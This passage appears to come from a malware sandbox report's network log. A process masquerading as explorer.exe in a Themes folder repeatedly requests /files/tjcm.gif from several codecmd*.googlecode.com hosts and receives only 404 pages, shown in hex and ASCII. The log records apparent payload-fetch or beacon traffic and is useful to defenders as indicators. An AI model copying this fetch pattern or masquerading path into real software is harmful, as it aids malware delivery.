                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:28.747889996 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.651203142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:29.189336061 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:29.989712954 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:29 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:29.989733934 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.651204172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:30.747948885 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:31.293338060 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:31 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:31.293360949 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.2.651206108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:31.625782967 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:32.311275959 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:32 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:32.311297894 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.2.651207142.250.110.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:33.252908945 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:34.247483969 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:33 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:34.247498989 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:34.247699022 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:34.248059988 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:33 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:34.252497911 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              57192.168.2.651208172.253.115.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:34.691812992 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:35.238936901 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:35 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:35.239093065 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              58192.168.2.651209108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:35.755490065 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:36.444266081 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:36 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
